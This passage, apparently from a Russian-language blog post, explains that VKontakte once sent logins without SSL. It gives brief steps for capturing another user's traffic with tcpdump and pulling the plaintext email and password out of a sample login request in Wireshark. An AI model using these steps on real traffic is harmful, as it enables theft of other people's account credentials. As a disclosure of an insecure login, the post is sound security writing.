неправильно. Все передается в открытом виде, даже SSL не используется.

Если нужна краткая инструкция, то:
1. Получив доступ к компьютеру, через который проходят запросы пользователя к вконтакту, делаем дамп трафика.
tcpdump -i интерфейс -s 4096 -r файл.tcpdump
2. Когда нужный нам запрос точно попал в файл, анализируем его.

Аутентификация на вконтакте проходит в два шага - перед отправкой формы, он делает аякс-зарос почтового ящика или логина, который указали в поле.
Если такой существует в базе, то форма с логином и паролем отправляется в незашифрованном виде на login.vk.com.

Если посмотреть в файле дампа момент когда была отправлена форма, можно найти два TCP-потока, первый это отправка ajax-запроса на подтверждение логина, второй, это непосредственно форма с паролем.

Можно конечно просто поиском в текстовом редакторе найти в дампе строчку "Host: login.vk.com", но более правильным будет открыть полученный дамп в wireshark'е, ввести в поле фильтра http.host == "login.vk.com", и получить совсем немного записей. follow TCP Stream для каждой из них даст примерно следующий результат:

POST / HTTP/1.1
Host: login.vk.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.261.0 Safari/532.6
Referer: http://vkontakte.ru/login.php?r=1&email=test%40test.ru
Content-Length: 102
Cache-Control: max-age=0
Origin: http://vkontakte.ru
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3

act=login&success_url=&fail_url=&try_to_login=1&to =&vk=&email=wolong%40sibears.org&pass=ПАРОЛЬ &expire=